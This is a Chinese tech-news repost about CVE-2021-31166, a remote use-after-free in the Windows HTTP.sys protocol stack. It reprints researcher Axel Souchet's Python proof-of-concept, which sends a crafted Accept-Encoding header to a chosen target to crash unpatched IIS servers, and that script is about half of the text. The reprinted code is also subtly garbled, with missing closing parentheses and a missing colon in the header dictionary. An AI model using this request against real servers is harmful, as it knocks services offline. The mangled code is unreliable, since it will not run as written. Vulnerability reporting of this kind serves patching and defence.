加入收藏 | 设为首页 | 会员中心 | 我要投稿 开发网_开封站长网 (http://www.0378zz.com/)- 科技、AI行业应用、媒体智能、低代码、办公协同!
当前位置: 首页 > 服务器 > 安全 > 正文

Windows操作系统HTTP协议栈内存破坏漏洞PoC揭晓

发布时间:2021-05-22 20:52:41 所属栏目:安全 来源:互联网
导读:虽然该漏洞CVSS评分为9.8分,听起来非常危险,但该漏洞只影响最新的一些Windows版本,具体影响Windows 10、Windows server 2004、Windows server 20H2的不同版本。 5月17日,安全研究人员Axel Souchet在GitHub上公开了该漏洞的PoC代码。该PoC代码可以使运行I


虽然该漏洞CVSS评分为9.8分,听起来非常危险,但该漏洞只影响最新的一些Windows版本,具体影响Windows 10、Windows server 2004、Windows server 20H2的不同版本。

5月17日,安全研究人员Axel Souchet在GitHub上公开了该漏洞的PoC代码。该PoC代码可以使运行IIS 服务器的未修复的Windows系统奔溃,但是并没有实现蠕虫功能。

PoC代码参见:https://github.com/0vercl0k/CVE-2021-31166


  1. import requests 
  2. import argparse 
  3.   
  4.   
  5. def main(): 
  6.     parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys'
  7.     parser.add_argument('--target', required = True
  8.     args = parser.parse_args() 
  9.     r = requests.get(f'http://{args.target}/', headers = { 
  10.         'Accept-Encoding''doar-e, ftw, imo, ,'
  11.     }) 
  12.     print(r) 

(编辑:开发网_开封站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    热点阅读